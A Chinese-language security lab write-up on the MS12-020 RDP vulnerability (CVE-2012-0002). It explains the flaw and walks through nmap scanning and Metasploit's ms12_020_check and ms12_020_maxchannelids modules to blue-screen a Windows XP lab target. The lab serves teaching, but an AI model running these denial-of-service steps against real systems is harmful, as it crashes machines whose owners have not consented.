实验目的:
熟悉ms12-020漏洞的原理及利用方法
实验环境:
操作机:kali-linux-2022.4 IP:192.168.140.128
靶机:Windows XP Professio IP:192.168.140.132
实验原理:
(1) MS12-020(全称:Microsoft windows远程桌面协议RDP远程代码执行漏洞),远程桌面协议(RDP, Remote Desktop Protocol)是一个多通道(multi-channel)的协议,让用户(客户端或称“本地电脑”)连上提供微软终端机服务的电脑(服务器端或称“远程电脑”)。Windows在处理某些对象时存在错误,可通过特制的RDP报文访问未初始化的或已经删除的对象,导致任意代码执行,然后控制系统。
CVE ID: CVE-2012-0002
官方补丁地址:https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-020
实验步骤:
- 打开windows xp的远程服务
控制面板–>系统–>远程–>远程协助–>远程桌面
控制面板–>windows防火墙–>例外>远程桌面
- 用kali的nmap扫描主机 查看3389端口是否打开
发现已经打开
- 在kali的终端中打开msfconsole
- 利用search功能搜索ms12-020 搜索到两个模块
- 使用第一个模块,进入扫描模块
use auxiliary/scanner/rdp/ms12_020_check或者 use 0
输入show options找寻选项
发现RHOSTS可知是一个网段 IP地址是靶机
先set rhosts 192.168.140.132 再run
可以看到绿色加号的那一行显示 windows xp的3389端口是易受攻击的
判定存在ms12-020(蓝屏攻击)漏洞
(6)使用第二个模块,进入攻击模块
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids或者 use 1
直接 set rhosts 192.168.140.132 再run 执行攻击
攻击成功
因windows xp 蓝屏后自动重启 没有截到蓝屏图